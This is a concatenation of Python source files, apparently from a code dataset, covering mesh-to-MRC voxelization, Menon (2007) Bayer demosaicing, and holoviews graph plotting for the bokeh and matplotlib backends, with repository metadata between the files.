mrc_header_cella = mrcdata.header.cella
mrc_header_cellb = mrcdata.header.cellb
mrc_header_origin = mrcdata.header.origin
#mrc_ext_header = mrcdata.extended_header
                    if origin is None:
                        origin_from_file = True
                    if voxel_width is None:
voxel_width_from_file = True
# mrcdata.voxel_size contains the width of the voxel
# (Sometimes it is a numpy array with 3 elements.)
if hasattr(mrcdata.voxel_size, 'x'):
voxel_width = float(mrcdata.voxel_size.x)
                            # Due to roundoff error, the following is always true
# COMMENTING OUT:
#if ((mrcdata.voxel_size.x != mrcdata.voxel_size.y)
# or
# (mrcdata.voxel_size.y != mrcdata.voxel_size.z)):
# sys.stderr.write('Warning: The voxels in file "'+args.fname_mrc_orig+'"\n'
# ' have a different width in the X,Y,Z directions.\n'
# ' Using the voxel width in the X direction\n')
else:
                            voxel_width = float(mrcdata.voxel_size)
bounds = (0.0, mrcdata.header.nx*voxel_width,
0.0, mrcdata.header.ny*voxel_width,
0.0, mrcdata.header.nz*voxel_width)
# Should we consider non-zero origin? In the future,
# if the origin is not at 0,0,0, perhaps we should use this:
# I'll worry about this later. -Andrew 2021-6-17
#bounds = (mrcdata.header.origin.x,
# (mrcdata.header.origin.x +
# mrcdata.header.nx*voxel_width),
# mrcdata.header.origin.y,
# (mrcdata.header.origin.y +
# mrcdata.header.ny*voxel_width),
# mrcdata.header.origin.z,
# (mrcdata.header.origin.z +
# mrcdata.header.nz*voxel_width))
mrcdata.close()
except IOError:
raise InputError('Error: Unable to open file "'+
args.fname_mrc_orig+'" for reading.\n')
        elif voxel_width is None:
            voxel_width = 1
        assert voxel_width is not None
# Alternatively, did the user specify the bounds in units of voxels?
if args.ibounds:
bounds = (args.ibounds[0]*voxel_width,
(args.ibounds[1]+0.99)*voxel_width,
args.ibounds[2]*voxel_width,
(args.ibounds[3]+0.99)*voxel_width,
args.ibounds[4]*voxel_width,
(args.ibounds[5]+0.99)*voxel_width)
# Did the user want us to shift the x,y,z coordinates of the mesh?
if args.shift:
            # bounds may be a tuple; convert it to a mutable list before shifting.
            bounds = list(bounds)
            bounds[0] -= args.shift[0]*voxel_width
            bounds[1] -= args.shift[0]*voxel_width
            bounds[2] -= args.shift[1]*voxel_width
            bounds[3] -= args.shift[1]*voxel_width
            bounds[4] -= args.shift[2]*voxel_width
            bounds[5] -= args.shift[2]*voxel_width
# Now convert the mesh into an image whose (physical) size is "bounds"
voxels = voxelize_numpy(mesh,
density=voxel_width,
check_surface=True,
bounds=bounds)
# Now save the resulting numpy array as an MRC file
mrcdata = mrcfile.new(args.fname_out, overwrite=True)
#mrcdata.voxel_size = voxel_width
if voxel_width_from_file:
mrcdata.header.cella = mrc_header_cella
mrcdata.header.cellb = mrc_header_cellb
#mrcdata.set_extended_header(mrc_ext_header)
else:
mrcdata.header.cella.x = voxel_width * voxels.shape[2]
mrcdata.header.cella.y = voxel_width * voxels.shape[1]
mrcdata.header.cella.z = voxel_width * voxels.shape[0]
if origin_from_file:
mrcdata.header.origin = mrc_header_origin
mrcdata.set_data(voxels)
mrcdata.close()
# Note to self: Here's a way to visualize the results using pyvista:
#voxels["density"] = np.full(voxels.n_cells, 3.65) # 3.65 is arbitrary
#voxels.plot(scalars="density")
# Alternative method:
#voxels.compute_implicit_distance(mesh, inplace=True)
#contours = voxels.contour(20, scalars="implicit_distance")
#p.add_mesh(contours, opacity=0.5, scalars="implicit_distance")
#p.show()
#p = pv.Plotter()
except (InputError, ValueError) as err:
sys.stderr.write('\n' + str(err) + '\n')
sys.exit(-1)
return
if __name__ == '__main__':
main()
```
|
{
"source": "jewfro-cuban/colour-demosaicing",
"score": 2
}
|
#### File: bayer/demosaicing/menon2007.py
```python
from __future__ import division, unicode_literals
import numpy as np
from scipy.ndimage.filters import convolve, convolve1d
from colour.utilities import as_float_array, tsplit, tstack
from colour_demosaicing.bayer import masks_CFA_Bayer
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2015-2019 - Colour Developers'
__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '<EMAIL>'
__status__ = 'Production'
__all__ = [
'demosaicing_CFA_Bayer_Menon2007', 'demosaicing_CFA_Bayer_DDFAPD',
'refining_step_Menon2007'
]
def _cnv_h(x, y):
"""
Helper function for horizontal convolution.
"""
return convolve1d(x, y, mode='mirror')
def _cnv_v(x, y):
"""
Helper function for vertical convolution.
"""
return convolve1d(x, y, mode='mirror', axis=0)
def demosaicing_CFA_Bayer_Menon2007(CFA, pattern='RGGB', refining_step=True):
"""
Returns the demosaiced *RGB* colourspace array from given *Bayer* CFA using
DDFAPD - *Menon (2007)* demosaicing algorithm.
Parameters
----------
CFA : array_like
*Bayer* CFA.
pattern : unicode, optional
**{'RGGB', 'BGGR', 'GRBG', 'GBRG'}**,
Arrangement of the colour filters on the pixel array.
refining_step : bool
Perform refining step.
Returns
-------
ndarray
*RGB* colourspace array.
Notes
-----
- The definition output is not clipped in range [0, 1] : this allows for
direct HDRI / radiance image generation on *Bayer* CFA data and post
demosaicing of the high dynamic range data as showcased in this
`Jupyter Notebook <https://github.com/colour-science/colour-hdri/\
blob/develop/colour_hdri/examples/\
examples_merge_from_raw_files_with_post_demosaicing.ipynb>`_.
References
----------
:cite:`Menon2007c`
Examples
--------
>>> CFA = np.array(
... [[ 0.30980393, 0.36078432, 0.30588236, 0.3764706 ],
... [ 0.35686275, 0.39607844, 0.36078432, 0.40000001]])
>>> demosaicing_CFA_Bayer_Menon2007(CFA)
array([[[ 0.30980393, 0.35686275, 0.39215687],
[ 0.30980393, 0.36078432, 0.39607844],
[ 0.30588236, 0.36078432, 0.39019608],
[ 0.32156864, 0.3764706 , 0.40000001]],
<BLANKLINE>
[[ 0.30980393, 0.35686275, 0.39215687],
[ 0.30980393, 0.36078432, 0.39607844],
[ 0.30588236, 0.36078432, 0.39019609],
[ 0.32156864, 0.3764706 , 0.40000001]]])
>>> CFA = np.array(
... [[ 0.3764706 , 0.36078432, 0.40784314, 0.3764706 ],
... [ 0.35686275, 0.30980393, 0.36078432, 0.29803923]])
>>> demosaicing_CFA_Bayer_Menon2007(CFA, 'BGGR')
array([[[ 0.30588236, 0.35686275, 0.3764706 ],
[ 0.30980393, 0.36078432, 0.39411766],
[ 0.29607844, 0.36078432, 0.40784314],
[ 0.29803923, 0.3764706 , 0.42352942]],
<BLANKLINE>
[[ 0.30588236, 0.35686275, 0.3764706 ],
[ 0.30980393, 0.36078432, 0.39411766],
[ 0.29607844, 0.36078432, 0.40784314],
[ 0.29803923, 0.3764706 , 0.42352942]]])
"""
CFA = as_float_array(CFA)
R_m, G_m, B_m = masks_CFA_Bayer(CFA.shape, pattern)
h_0 = np.array([0, 0.5, 0, 0.5, 0])
h_1 = np.array([-0.25, 0, 0.5, 0, -0.25])
R = CFA * R_m
G = CFA * G_m
B = CFA * B_m
G_H = np.where(G_m == 0, _cnv_h(CFA, h_0) + _cnv_h(CFA, h_1), G)
G_V = np.where(G_m == 0, _cnv_v(CFA, h_0) + _cnv_v(CFA, h_1), G)
C_H = np.where(R_m == 1, R - G_H, 0)
C_H = np.where(B_m == 1, B - G_H, C_H)
C_V = np.where(R_m == 1, R - G_V, 0)
C_V = np.where(B_m == 1, B - G_V, C_V)
D_H = np.abs(C_H - np.pad(C_H, ((0, 0),
(0, 2)), mode=str('reflect'))[:, 2:])
D_V = np.abs(C_V - np.pad(C_V, ((0, 2),
(0, 0)), mode=str('reflect'))[2:, :])
del h_0, h_1, CFA, C_V, C_H
k = np.array(
[[0, 0, 1, 0, 1],
[0, 0, 0, 1, 0],
[0, 0, 3, 0, 3],
[0, 0, 0, 1, 0],
[0, 0, 1, 0, 1]]) # yapf: disable
d_H = convolve(D_H, k, mode='constant')
d_V = convolve(D_V, np.transpose(k), mode='constant')
del D_H, D_V
mask = d_V >= d_H
G = np.where(mask, G_H, G_V)
M = np.where(mask, 1, 0)
del d_H, d_V, G_H, G_V
# Red rows.
R_r = np.transpose(np.any(R_m == 1, axis=1)[np.newaxis]) * np.ones(R.shape)
# Blue rows.
B_r = np.transpose(np.any(B_m == 1, axis=1)[np.newaxis]) * np.ones(B.shape)
k_b = np.array([0.5, 0, 0.5])
R = np.where(
np.logical_and(G_m == 1, R_r == 1),
G + _cnv_h(R, k_b) - _cnv_h(G, k_b),
R,
)
R = np.where(
np.logical_and(G_m == 1, B_r == 1) == 1,
G + _cnv_v(R, k_b) - _cnv_v(G, k_b),
R,
)
B = np.where(
np.logical_and(G_m == 1, B_r == 1),
G + _cnv_h(B, k_b) - _cnv_h(G, k_b),
B,
)
B = np.where(
np.logical_and(G_m == 1, R_r == 1) == 1,
G + _cnv_v(B, k_b) - _cnv_v(G, k_b),
B,
)
R = np.where(
np.logical_and(B_r == 1, B_m == 1),
np.where(
M == 1,
B + _cnv_h(R, k_b) - _cnv_h(B, k_b),
B + _cnv_v(R, k_b) - _cnv_v(B, k_b),
),
R,
)
B = np.where(
np.logical_and(R_r == 1, R_m == 1),
np.where(
M == 1,
R + _cnv_h(B, k_b) - _cnv_h(R, k_b),
R + _cnv_v(B, k_b) - _cnv_v(R, k_b),
),
B,
)
RGB = tstack([R, G, B])
del R, G, B, k_b, R_r, B_r
if refining_step:
RGB = refining_step_Menon2007(RGB, tstack([R_m, G_m, B_m]), M)
del M, R_m, G_m, B_m
return RGB
demosaicing_CFA_Bayer_DDFAPD = demosaicing_CFA_Bayer_Menon2007
def refining_step_Menon2007(RGB, RGB_m, M):
"""
Performs the refining step on given *RGB* colourspace array.
Parameters
----------
RGB : array_like
*RGB* colourspace array.
RGB_m : array_like
*Bayer* CFA red, green and blue masks.
M : array_like
Estimation for the best directional reconstruction.
Returns
-------
ndarray
Refined *RGB* colourspace array.
Examples
--------
>>> RGB = np.array(
... [[[0.30588236, 0.35686275, 0.3764706],
... [0.30980393, 0.36078432, 0.39411766],
... [0.29607844, 0.36078432, 0.40784314],
... [0.29803923, 0.37647060, 0.42352942]],
... [[0.30588236, 0.35686275, 0.3764706],
... [0.30980393, 0.36078432, 0.39411766],
... [0.29607844, 0.36078432, 0.40784314],
... [0.29803923, 0.37647060, 0.42352942]]])
>>> RGB_m = np.array(
... [[[0, 0, 1],
... [0, 1, 0],
... [0, 0, 1],
... [0, 1, 0]],
... [[0, 1, 0],
... [1, 0, 0],
... [0, 1, 0],
... [1, 0, 0]]])
>>> M = np.array(
... [[0, 1, 0, 1],
... [1, 0, 1, 0]])
>>> refining_step_Menon2007(RGB, RGB_m, M)
array([[[ 0.30588236, 0.35686275, 0.3764706 ],
[ 0.30980393, 0.36078432, 0.39411765],
[ 0.29607844, 0.36078432, 0.40784314],
[ 0.29803923, 0.3764706 , 0.42352942]],
<BLANKLINE>
[[ 0.30588236, 0.35686275, 0.3764706 ],
[ 0.30980393, 0.36078432, 0.39411766],
[ 0.29607844, 0.36078432, 0.40784314],
[ 0.29803923, 0.3764706 , 0.42352942]]])
"""
R, G, B = tsplit(RGB)
R_m, G_m, B_m = tsplit(RGB_m)
M = as_float_array(M)
del RGB, RGB_m
# Updating of the green component.
R_G = R - G
B_G = B - G
FIR = np.ones(3) / 3
B_G_m = np.where(
B_m == 1,
np.where(M == 1, _cnv_h(B_G, FIR), _cnv_v(B_G, FIR)),
0,
)
R_G_m = np.where(
R_m == 1,
np.where(M == 1, _cnv_h(R_G, FIR), _cnv_v(R_G, FIR)),
0,
)
del B_G, R_G
G = np.where(R_m == 1, R - R_G_m, G)
G = np.where(B_m == 1, B - B_G_m, G)
# Updating of the red and blue components in the green locations.
# Red rows.
R_r = np.transpose(np.any(R_m == 1, axis=1)[np.newaxis]) * np.ones(R.shape)
# Red columns.
R_c = np.any(R_m == 1, axis=0)[np.newaxis] * np.ones(R.shape)
# Blue rows.
B_r = np.transpose(np.any(B_m == 1, axis=1)[np.newaxis]) * np.ones(B.shape)
# Blue columns.
B_c = np.any(B_m == 1, axis=0)[np.newaxis] * np.ones(B.shape)
R_G = R - G
B_G = B - G
k_b = np.array([0.5, 0, 0.5])
R_G_m = np.where(
np.logical_and(G_m == 1, B_r == 1),
_cnv_v(R_G, k_b),
R_G_m,
)
R = np.where(np.logical_and(G_m == 1, B_r == 1), G + R_G_m, R)
R_G_m = np.where(
np.logical_and(G_m == 1, B_c == 1),
_cnv_h(R_G, k_b),
R_G_m,
)
R = np.where(np.logical_and(G_m == 1, B_c == 1), G + R_G_m, R)
del B_r, R_G_m, B_c, R_G
B_G_m = np.where(
np.logical_and(G_m == 1, R_r == 1),
_cnv_v(B_G, k_b),
B_G_m,
)
B = np.where(np.logical_and(G_m == 1, R_r == 1), G + B_G_m, B)
B_G_m = np.where(
np.logical_and(G_m == 1, R_c == 1),
_cnv_h(B_G, k_b),
B_G_m,
)
B = np.where(np.logical_and(G_m == 1, R_c == 1), G + B_G_m, B)
del B_G_m, R_r, R_c, G_m, B_G
# Updating of the red (blue) component in the blue (red) locations.
R_B = R - B
R_B_m = np.where(
B_m == 1,
np.where(M == 1, _cnv_h(R_B, FIR), _cnv_v(R_B, FIR)),
0,
)
R = np.where(B_m == 1, B + R_B_m, R)
R_B_m = np.where(
R_m == 1,
np.where(M == 1, _cnv_h(R_B, FIR), _cnv_v(R_B, FIR)),
0,
)
B = np.where(R_m == 1, R - R_B_m, B)
del R_B, R_B_m, R_m
return tstack([R, G, B])
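# Illustrative end-to-end sketch (added for clarity, not part of the original
# module): demosaic a small synthetic 'RGGB' mosaic with the refining step enabled.
def _example_demosaicing_usage():
    CFA = np.random.random((8, 8))  # synthetic mosaic; real data comes from a sensor
    return demosaicing_CFA_Bayer_Menon2007(CFA, pattern='RGGB', refining_step=True)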
```
|
{
"source": "jewfro-cuban/holoviews",
"score": 2
}
|
#### File: plotting/bokeh/graphs.py
```python
from collections import defaultdict
import param
import numpy as np
from bokeh.models import (StaticLayoutProvider, NodesAndLinkedEdges,
EdgesAndLinkedNodes, Patches, Bezier, ColumnDataSource)
from ...core.data import Dataset
from ...core.util import (basestring, dimension_sanitizer, unique_array,
max_range)
from ...core.options import Cycle
from .chart import ColorbarPlot, PointPlot
from .element import (CompositeElementPlot, LegendPlot, line_properties,
fill_properties, text_properties)
from ..util import process_cmap
from .util import rgba_tuple
class GraphPlot(CompositeElementPlot, ColorbarPlot, LegendPlot):
color_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the color will the drawn""")
edge_color_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the color will the drawn""")
selection_policy = param.ObjectSelector(default='nodes', objects=['edges', 'nodes', None], doc="""
Determines policy for inspection of graph components, i.e. whether to highlight
nodes or edges when selecting connected edges and nodes respectively.""")
inspection_policy = param.ObjectSelector(default='nodes', objects=['edges', 'nodes', None], doc="""
Determines policy for inspection of graph components, i.e. whether to highlight
nodes or edges when hovering over connected edges and nodes respectively.""")
tools = param.List(default=['hover', 'tap'], doc="""
A list of plugin tools to use on the plot.""")
# Map each glyph to a style group
_style_groups = {'scatter': 'node', 'multi_line': 'edge', 'patches': 'edge', 'bezier': 'edge'}
style_opts = (['edge_'+p for p in fill_properties+line_properties] +
['node_'+p for p in fill_properties+line_properties] +
['node_size', 'cmap', 'edge_cmap'])
# Filled is only supported for subclasses
filled = False
# Bezier paths
bezier = False
# Declares which columns in the data refer to node indices
_node_columns = [0, 1]
@property
def edge_glyph(self):
if self.filled:
return 'patches_1'
elif self.bezier:
return 'bezier_1'
else:
return 'multi_line_1'
def _hover_opts(self, element):
if self.inspection_policy == 'nodes':
dims = element.nodes.dimensions()
dims = [(dims[2].pprint_label, '@{index_hover}')]+dims[3:]
elif self.inspection_policy == 'edges':
kdims = [(kd.pprint_label, '@{%s_values}' % kd)
if kd in ('start', 'end') else kd for kd in element.kdims]
dims = kdims+element.vdims
else:
dims = []
return dims, {}
def get_extents(self, element, ranges, range_type='combined'):
return super(GraphPlot, self).get_extents(element.nodes, ranges, range_type)
def _get_axis_labels(self, *args, **kwargs):
"""
Override axis labels to group all key dimensions together.
"""
element = self.current_frame
xlabel, ylabel = [kd.pprint_label for kd in element.nodes.kdims[:2]]
return xlabel, ylabel, None
def _get_edge_colors(self, element, ranges, edge_data, edge_mapping, style):
cdim = element.get_dimension(self.edge_color_index)
if not cdim:
return
elstyle = self.lookup_options(element, 'style')
cycle = elstyle.kwargs.get('edge_color')
idx = element.get_dimension_index(cdim)
field = dimension_sanitizer(cdim.name)
cvals = element.dimension_values(cdim)
if idx in self._node_columns:
factors = element.nodes.dimension_values(2, expanded=False)
elif idx == 2 and cvals.dtype.kind in 'uif':
factors = None
else:
factors = unique_array(cvals)
default_cmap = 'viridis' if factors is None else 'tab20'
cmap = style.get('edge_cmap', style.get('cmap', default_cmap))
nan_colors = {k: rgba_tuple(v) for k, v in self.clipping_colors.items()}
if factors is None or (factors.dtype.kind in 'uif' and idx not in self._node_columns):
colors, factors = None, None
else:
if factors.dtype.kind == 'f':
cvals = cvals.astype(np.int32)
factors = factors.astype(np.int32)
if factors.dtype.kind not in 'SU':
field += '_str__'
cvals = [str(f) for f in cvals]
factors = (str(f) for f in factors)
factors = list(factors)
if isinstance(cmap, dict):
colors = [cmap.get(f, nan_colors.get('NaN', self._default_nan)) for f in factors]
else:
colors = process_cmap(cycle or cmap, len(factors))
if field not in edge_data:
edge_data[field] = cvals
edge_style = dict(style, cmap=cmap)
mapper = self._get_colormapper(cdim, element, ranges, edge_style,
factors, colors, 'edge_colormapper')
transform = {'field': field, 'transform': mapper}
color_type = 'fill_color' if self.filled else 'line_color'
edge_mapping['edge_'+color_type] = transform
edge_mapping['edge_nonselection_'+color_type] = transform
edge_mapping['edge_selection_'+color_type] = transform
def _get_edge_paths(self, element):
path_data, mapping = {}, {}
xidx, yidx = (1, 0) if self.invert_axes else (0, 1)
if element._edgepaths is not None:
edges = element._split_edgepaths.split(datatype='array', dimensions=element.edgepaths.kdims)
if len(edges) == len(element):
path_data['xs'] = [path[:, xidx] for path in edges]
path_data['ys'] = [path[:, yidx] for path in edges]
mapping = {'xs': 'xs', 'ys': 'ys'}
else:
raise ValueError("Edge paths do not match the number of supplied edges."
"Expected %d, found %d paths." % (len(element), len(edges)))
return path_data, mapping
def get_data(self, element, ranges, style):
# Force static source to False
static = self.static_source
self.handles['static_source'] = static
self.static_source = False
# Get node data
nodes = element.nodes.dimension_values(2)
node_positions = element.nodes.array([0, 1])
# Map node indices to integers
if nodes.dtype.kind not in 'uif':
node_indices = {v: i for i, v in enumerate(nodes)}
index = np.array([node_indices[n] for n in nodes], dtype=np.int32)
layout = {str(node_indices[k]): (y, x) if self.invert_axes else (x, y)
for k, (x, y) in zip(nodes, node_positions)}
else:
index = nodes.astype(np.int32)
layout = {str(k): (y, x) if self.invert_axes else (x, y)
for k, (x, y) in zip(index, node_positions)}
point_data = {'index': index}
cycle = self.lookup_options(element, 'style').kwargs.get('node_color')
if isinstance(cycle, Cycle):
style.pop('node_color', None)
colors = cycle
else:
colors = None
cdata, cmapping = self._get_color_data(
element.nodes, ranges, style, name='node_fill_color',
colors=colors, int_categories=True
)
point_data.update(cdata)
point_mapping = cmapping
if 'node_fill_color' in point_mapping:
style = {k: v for k, v in style.items() if k not in
['node_fill_color', 'node_nonselection_fill_color']}
point_mapping['node_nonselection_fill_color'] = point_mapping['node_fill_color']
edge_mapping = {}
nan_node = index.max()+1 if len(index) else 0
start, end = (element.dimension_values(i) for i in range(2))
if nodes.dtype.kind == 'f':
start, end = start.astype(np.int32), end.astype(np.int32)
elif nodes.dtype.kind != 'i':
start = np.array([node_indices.get(x, nan_node) for x in start], dtype=np.int32)
end = np.array([node_indices.get(y, nan_node) for y in end], dtype=np.int32)
path_data = dict(start=start, end=end)
self._get_edge_colors(element, ranges, path_data, edge_mapping, style)
if not static:
pdata, pmapping = self._get_edge_paths(element)
path_data.update(pdata)
edge_mapping.update(pmapping)
# Get hover data
if 'hover' in self.handles:
if self.inspection_policy == 'nodes':
index_dim = element.nodes.get_dimension(2)
point_data['index_hover'] = [index_dim.pprint_value(v) for v in element.nodes.dimension_values(2)]
for d in element.nodes.dimensions()[3:]:
point_data[dimension_sanitizer(d.name)] = element.nodes.dimension_values(d)
elif self.inspection_policy == 'edges':
for d in element.dimensions():
dim_name = dimension_sanitizer(d.name)
if dim_name in ('start', 'end'):
dim_name += '_values'
path_data[dim_name] = element.dimension_values(d)
data = {'scatter_1': point_data, self.edge_glyph: path_data, 'layout': layout}
mapping = {'scatter_1': point_mapping, self.edge_glyph: edge_mapping}
return data, mapping, style
def _update_datasource(self, source, data):
"""
Update datasource with data for a new frame.
"""
if isinstance(source, ColumnDataSource):
if self.handles['static_source']:
source.trigger('data')
else:
source.data.update(data)
else:
source.graph_layout = data
def _init_glyphs(self, plot, element, ranges, source):
# Get data and initialize data source
style = self.style[self.cyclic_index]
data, mapping, style = self.get_data(element, ranges, style)
edge_mapping = {k: v for k, v in mapping[self.edge_glyph].items()
if 'color' not in k}
self.handles['previous_id'] = element._plot_id
properties = {}
mappings = {}
for key in list(mapping):
if not any(glyph in key for glyph in ('scatter_1', self.edge_glyph)):
continue
source = self._init_datasource(data.pop(key, {}))
self.handles[key+'_source'] = source
glyph_props = self._glyph_properties(plot, element, source, ranges, style)
properties.update(glyph_props)
mappings.update(mapping.pop(key, {}))
properties = {p: v for p, v in properties.items() if p not in ('legend', 'source')}
properties.update(mappings)
layout = data.pop('layout', {})
if data and mapping:
CompositeElementPlot._init_glyphs(self, plot, element, ranges, source,
data, mapping, style)
# Define static layout
layout = StaticLayoutProvider(graph_layout=layout)
node_source = self.handles['scatter_1_source']
edge_source = self.handles[self.edge_glyph+'_source']
renderer = plot.graph(node_source, edge_source, layout, **properties)
# Initialize GraphRenderer
if self.selection_policy == 'nodes':
renderer.selection_policy = NodesAndLinkedEdges()
elif self.selection_policy == 'edges':
renderer.selection_policy = EdgesAndLinkedNodes()
else:
renderer.selection_policy = None
if self.inspection_policy == 'nodes':
renderer.inspection_policy = NodesAndLinkedEdges()
elif self.inspection_policy == 'edges':
renderer.inspection_policy = EdgesAndLinkedNodes()
else:
renderer.inspection_policy = None
self.handles['layout_source'] = layout
self.handles['glyph_renderer'] = renderer
self.handles['scatter_1_glyph_renderer'] = renderer.node_renderer
self.handles[self.edge_glyph+'_glyph_renderer'] = renderer.edge_renderer
self.handles['scatter_1_glyph'] = renderer.node_renderer.glyph
if self.filled or self.bezier:
glyph_model = Patches if self.filled else Bezier
allowed_properties = glyph_model.properties()
for glyph_type in ('', 'selection_', 'nonselection_', 'hover_', 'muted_'):
glyph = getattr(renderer.edge_renderer, glyph_type+'glyph', None)
if glyph is None:
continue
props = self._process_properties(self.edge_glyph, properties, mappings)
filtered = self._filter_properties(props, glyph_type, allowed_properties)
new_glyph = glyph_model(**dict(filtered, **edge_mapping))
setattr(renderer.edge_renderer, glyph_type+'glyph', new_glyph)
self.handles[self.edge_glyph+'_glyph'] = renderer.edge_renderer.glyph
if 'hover' in self.handles:
if self.handles['hover'].renderers == 'auto':
self.handles['hover'].renderers = []
self.handles['hover'].renderers.append(renderer)
class ChordPlot(GraphPlot):
label_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the node labels will be drawn""")
show_frame = param.Boolean(default=False, doc="""
Whether or not to show a complete frame around the plot.""")
# Map each glyph to a style group
_style_groups = {'scatter': 'node', 'multi_line': 'edge', 'text': 'label',
'arc': 'arc'}
style_opts = (GraphPlot.style_opts + ['label_'+p for p in text_properties])
_draw_order = ['scatter', 'multi_line', 'layout']
def get_extents(self, element, ranges, range_type='combined'):
"""
A Chord plot is always drawn on a unit circle.
"""
xdim, ydim = element.nodes.kdims[:2]
if range_type not in ('combined', 'data', 'extents'):
return xdim.range[0], ydim.range[0], xdim.range[1], ydim.range[1]
rng = 1.1 if element.nodes.get_dimension(self.label_index) is None else 1.4
x0, x1 = max_range([xdim.range, (-rng, rng)])
y0, y1 = max_range([ydim.range, (-rng, rng)])
return (x0, y0, x1, y1)
def get_data(self, element, ranges, style):
offset = style.pop('label_offset', 1.05)
data, mapping, style = super(ChordPlot, self).get_data(element, ranges, style)
if 'node_fill_color' in mapping['scatter_1']:
angles = element._angles
arcs = defaultdict(list)
for i in range(len(element.nodes)):
start, end = angles[i:i+2]
vals = np.linspace(start, end, 20)
xs, ys = np.cos(vals), np.sin(vals)
arcs['arc_xs'].append(xs)
arcs['arc_ys'].append(ys)
data['scatter_1'].update(arcs)
data['multi_line_2'] = data['scatter_1']
mapping['multi_line_2'] = {'xs': 'arc_xs', 'ys': 'arc_ys', 'line_width': 10}
mapping['multi_line_2']['line_color'] = mapping['scatter_1']['node_fill_color']
mapping['multi_line_2']['nonselection_line_color'] = mapping['scatter_1']['node_fill_color']
mapping['multi_line_2']['selection_line_color'] = mapping['scatter_1']['node_fill_color']
lidx = element.nodes.get_dimension(self.label_index)
if lidx is None:
if self.label_index is not None:
dims = element.nodes.dimensions()[2:]
self.warning("label_index supplied to Chord not found, "
"expected one of %s, got %s." %
(dims, self.label_index))
return data, mapping, style
nodes = element.nodes
if element.vdims:
values = element.dimension_values(element.vdims[0])
if values.dtype.kind in 'uif':
edges = Dataset(element)[values>0]
nodes = list(np.unique([edges.dimension_values(i) for i in range(2)]))
nodes = element.nodes.select(**{element.nodes.kdims[2].name: nodes})
xs, ys = (nodes.dimension_values(i)*offset for i in range(2))
labels = [lidx.pprint_value(v) for v in nodes.dimension_values(lidx)]
angles = np.arctan2(ys, xs)
data['text_1'] = dict(x=xs, y=ys, text=[str(l) for l in labels], angle=angles)
mapping['text_1'] = dict(text='text', x='x', y='y', angle='angle', text_baseline='middle')
return data, mapping, style
class NodePlot(PointPlot):
"""
Simple subclass of PointPlot which hides x, y position on hover.
"""
def _hover_opts(self, element):
return element.dimensions()[2:], {}
class TriMeshPlot(GraphPlot):
filled = param.Boolean(default=False, doc="""
Whether the triangles should be drawn as filled.""")
style_opts = (['edge_'+p for p in line_properties+fill_properties] +
['node_'+p for p in fill_properties+line_properties] +
['node_size', 'cmap', 'edge_cmap'])
# Declares that three columns in TriMesh refer to edges
_node_columns = [0, 1, 2]
def get_data(self, element, ranges, style):
# Ensure the edgepaths for the triangles are generated before plotting
simplex_dim = element.get_dimension(self.edge_color_index)
vertex_dim = element.nodes.get_dimension(self.edge_color_index)
if not isinstance(self.edge_color_index, int) and vertex_dim and not simplex_dim:
simplices = element.array([0, 1, 2])
z = element.nodes.dimension_values(vertex_dim)
z = z[simplices].mean(axis=1)
element = element.add_dimension(vertex_dim, len(element.vdims), z, vdim=True)
element.edgepaths
return super(TriMeshPlot, self).get_data(element, ranges, style)
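# Illustrative usage sketch (added for clarity; assumes a holoviews environment
# with the bokeh backend loaded, not part of this module):
#   import holoviews as hv
#   hv.extension('bokeh')
#   graph = hv.Graph(((np.array([0, 1, 2]), np.array([1, 2, 0])),))
#   graph.options(inspection_policy='edges', selection_policy='nodes')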
```
#### File: plotting/mpl/graphs.py
```python
import param
import numpy as np
from matplotlib.collections import LineCollection, PolyCollection
from ...core.data import Dataset
from ...core.options import Cycle
from ...core.util import basestring, unique_array, search_indices, max_range
from ..util import process_cmap
from .element import ColorbarPlot
class GraphPlot(ColorbarPlot):
color_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the color will the drawn""")
edge_color_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the color will the drawn""")
style_opts = ['edge_alpha', 'edge_color', 'edge_linestyle', 'edge_linewidth',
'node_alpha', 'node_color', 'node_edgecolors', 'node_facecolors',
'node_linewidth', 'node_marker', 'node_size', 'visible', 'cmap',
'edge_cmap']
_style_groups = ['node', 'edge']
filled = False
def _compute_styles(self, element, ranges, style):
elstyle = self.lookup_options(element, 'style')
color = elstyle.kwargs.get('node_color')
cdim = element.nodes.get_dimension(self.color_index)
cmap = elstyle.kwargs.get('cmap', 'tab20')
if cdim:
cs = element.nodes.dimension_values(self.color_index)
# Check if numeric otherwise treat as categorical
if cs.dtype.kind == 'f':
style['c'] = cs
else:
factors = unique_array(cs)
cmap = color if isinstance(color, Cycle) else cmap
if isinstance(cmap, dict):
colors = [cmap.get(f, cmap.get('NaN', {'color': self._default_nan})['color'])
for f in factors]
else:
colors = process_cmap(cmap, len(factors))
cs = search_indices(cs, factors)
style['node_facecolors'] = [colors[v%len(colors)] for v in cs]
style.pop('node_color', None)
if 'c' in style:
self._norm_kwargs(element.nodes, ranges, style, cdim)
elif color:
style['c'] = style.pop('node_color')
style['node_edgecolors'] = style.pop('node_edgecolors', 'none')
edge_cdim = element.get_dimension(self.edge_color_index)
if not edge_cdim:
return style
elstyle = self.lookup_options(element, 'style')
cycle = elstyle.kwargs.get('edge_color')
idx = element.get_dimension_index(edge_cdim)
cvals = element.dimension_values(edge_cdim)
if idx in [0, 1]:
factors = element.nodes.dimension_values(2, expanded=False)
elif idx == 2 and cvals.dtype.kind in 'uif':
factors = None
else:
factors = unique_array(cvals)
if factors is None or (factors.dtype.kind == 'f' and idx not in [0, 1]):
style['edge_array'] = cvals
else:
cvals = search_indices(cvals, factors)
factors = list(factors)
cmap = elstyle.kwargs.get('edge_cmap', 'tab20')
cmap = cycle if isinstance(cycle, Cycle) else cmap
if isinstance(cmap, dict):
colors = [cmap.get(f, cmap.get('NaN', {'color': self._default_nan})['color'])
for f in factors]
else:
colors = process_cmap(cmap, len(factors))
style['edge_colors'] = [colors[v%len(colors)] for v in cvals]
style.pop('edge_color', None)
if 'edge_array' in style:
self._norm_kwargs(element, ranges, style, edge_cdim, 'edge_')
else:
style.pop('edge_cmap', None)
if 'edge_vmin' in style:
